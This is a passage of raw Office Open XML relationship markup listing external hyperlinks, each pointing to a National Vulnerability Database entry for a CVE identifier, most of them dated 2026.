TargetMode="External" Id="rId5277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86756" TargetMode="External" Id="rId5278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86760" TargetMode="External" Id="rId5279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86761" TargetMode="External" Id="rId5280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86767" TargetMode="External" Id="rId5281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86768" TargetMode="External" Id="rId5282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86769" TargetMode="External" Id="rId5283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86773" TargetMode="External" Id="rId5284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86774" TargetMode="External" Id="rId5285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86781" TargetMode="External" Id="rId5286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86809" TargetMode="External" Id="rId5287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86994" TargetMode="External" Id="rId5288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86995" TargetMode="External" Id="rId5289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86996" TargetMode="External" Id="rId5290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87435" TargetMode="External" Id="rId5291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87439" TargetMode="External" Id="rId5292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87453" TargetMode="External" Id="rId5293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87518" TargetMode="External" Id="rId5294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87523" TargetMode="External" Id="rId5295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87566" TargetMode="External" Id="rId5296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87594" TargetMode="External" Id="rId5297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87605" TargetMode="External" Id="rId5298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87859" TargetMode="External" Id="rId5299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88011" TargetMode="External" Id="rId5300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88012" TargetMode="External" Id="rId5301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88015" TargetMode="External" Id="rId5302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88046" TargetMode="External" Id="rId5303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88057" TargetMode="External" Id="rId5304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88871" TargetMode="External" Id="rId5305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88875" TargetMode="External" Id="rId5306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88879" TargetMode="External" Id="rId5307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88892" TargetMode="External" Id="rId5308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88894" TargetMode="External" Id="rId5309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89179" TargetMode="External" Id="rId5310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89239" TargetMode="External" Id="rId5311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89240" TargetMode="External" Id="rId5312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89241" TargetMode="External" Id="rId5313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89244" TargetMode="External" Id="rId5314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89247" TargetMode="External" Id="rId5315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89257" TargetMode="External" Id="rId5316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9161" TargetMode="External" Id="rId5317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9338" TargetMode="External" Id="rId5318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9667" TargetMode="External" Id="rId5319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-7062" TargetMode="External" Id="rId5320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0297" TargetMode="External" Id="rId5321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0298" TargetMode="External" Id="rId5322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47228" TargetMode="External" Id="rId5323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53760" TargetMode="External" Id="rId5324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85092" TargetMode="External" Id="rId5325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85454" TargetMode="External" Id="rId5326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85544" TargetMode="External" Id="rId5327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71404" TargetMode="External" Id="rId5328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11891" TargetMode="External" Id="rId5329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12387" TargetMode="External" Id="rId5330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18738" TargetMode="External" Id="rId5331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21099" TargetMode="External" Id="rId5332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21106" TargetMode="External" Id="rId5333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21112" TargetMode="External" Id="rId5334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33387" TargetMode="External" Id="rId5335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33920" TargetMode="External" Id="rId5336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40507" TargetMode="External" Id="rId5337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40508" TargetMode="External" Id="rId5338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46714" TargetMode="External" Id="rId5339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47185" TargetMode="External" Id="rId5340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48550" TargetMode="External" Id="rId5341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48552" TargetMode="External" Id="rId5342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49391" TargetMode="External" Id="rId5343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52886" TargetMode="External" Id="rId5344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53457" TargetMode="External" Id="rId5345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53720" TargetMode="External" Id="rId5346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54742" TargetMode="External" Id="rId5347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56126" TargetMode="External" Id="rId5348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56127" TargetMode="External" Id="rId5349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56128" TargetMode="External" Id="rId5350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63105" TargetMode="External" Id="rId5351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63336" TargetMode="External" Id="rId5352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64653" TargetMode="External" Id="rId5353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67196" TargetMode="External" Id="rId5354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67333" TargetMode="External" Id="rId5355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67334" TargetMode="External" Id="rId5356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67338" TargetMode="External" Id="rId5357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68583" TargetMode="External" Id="rId5358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71498" TargetMode="External" Id="rId5359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71503" TargetMode="External" Id="rId5360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72747" TargetMode="External" Id="rId5361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72832" TargetMode="External" Id="rId5362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73037" TargetMode="External" Id="rId5363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73317" TargetMode="External" Id="rId5364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73318" TargetMode="External" Id="rId5365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73319" TargetMode="External" Id="rId5366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73320" TargetMode="External" Id="rId5367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73409" TargetMode="External" Id="rId5368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73423" TargetMode="External" Id="rId5369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73524" TargetMode="External" Id="rId5370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74908" TargetMode="External" Id="rId5371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75107" TargetMode="External" Id="rId5372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75831" TargetMode="External" Id="rId5373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75834" TargetMode="External" Id="rId5374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79777" TargetMode="External" Id="rId5375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81635" TargetMode="External" Id="rId5376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81887" TargetMode="External" Id="rId5377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82024" TargetMode="External" Id="rId5378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82069" TargetMode="External" Id="rId5379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82881" TargetMode="External" Id="rId5380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82911" TargetMode="External" Id="rId5381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84305" TargetMode="External" Id="rId5382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84386" TargetMode="External" Id="rId5383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84477" TargetMode="External" Id="rId5384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84967" TargetMode="External" Id="rId5385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85593" TargetMode="External" Id="rId5386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85598" TargetMode="External" Id="rId5387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85599" TargetMode="External" Id="rId5388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85600" TargetMode="External" Id="rId5389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85601" TargetMode="External" Id="rId5390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85781" TargetMode="External" Id="rId5391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86085" TargetMode="External" Id="rId5392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86197" TargetMode="External" Id="rId5393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86256" TargetMode="External" Id="rId5394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86351" TargetMode="External" Id="rId5395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86440" TargetMode="External" Id="rId5396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86516" TargetMode="External" Id="rId5397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86740" TargetMode="External" Id="rId5398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86742" TargetMode="External" Id="rId5399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86745" TargetMode="External" Id="rId5400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86763" TargetMode="External" Id="rId5401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86772" TargetMode="External" Id="rId5402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87083" TargetMode="External" Id="rId5403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87912" TargetMode="External" Id="rId5404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87913" TargetMode="External" Id="rId5405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87928" TargetMode="External" Id="rId5406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88921" TargetMode="External" Id="rId5407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89045" TargetMode="External" Id="rId5408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89148" TargetMode="External" Id="rId5409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89246" TargetMode="External" Id="rId5410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18238" TargetMode="External" Id="rId5411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4361" TargetMode="External" Id="rId5412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55067" TargetMode="External" Id="rId5413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55425" TargetMode="External" Id="rId5414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62293" TargetMode="External" Id="rId5415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70588" TargetMode="External" Id="rId5416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71201" TargetMode="External" Id="rId5417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72976" TargetMode="External" Id="rId5418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77699" TargetMode="External" Id="rId5419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78635" TargetMode="External" Id="rId5420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79723" TargetMode="External" Id="rId5421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79904" TargetMode="External" Id="rId5422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88001" TargetMode="External" Id="rId5423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-32736" TargetMode="External" Id="rId5424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11739" TargetMode="External" Id="rId5425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11814" TargetMode="External" Id="rId5426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16693" TargetMode="External" Id="rId5427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18386" TargetMode="External" Id="rId5428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19729" TargetMode="External" Id="rId5429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19800" TargetMode="External" Id="rId5430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19944" TargetMode="External" Id="rId5431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-22575" TargetMode="External" Id="rId5432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44253" TargetMode="External" Id="rId5433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45330" TargetMode="External" Id="rId5434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52832" TargetMode="External" Id="rId5435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53756" TargetMode="External" Id="rId5436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55164" TargetMode="External" Id="rId5437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55483" TargetMode="External" Id="rId5438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63179" TargetMode="External" Id="rId5439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68785" TargetMode="External" Id="rId5440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73304" TargetMode="External" Id="rId5441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 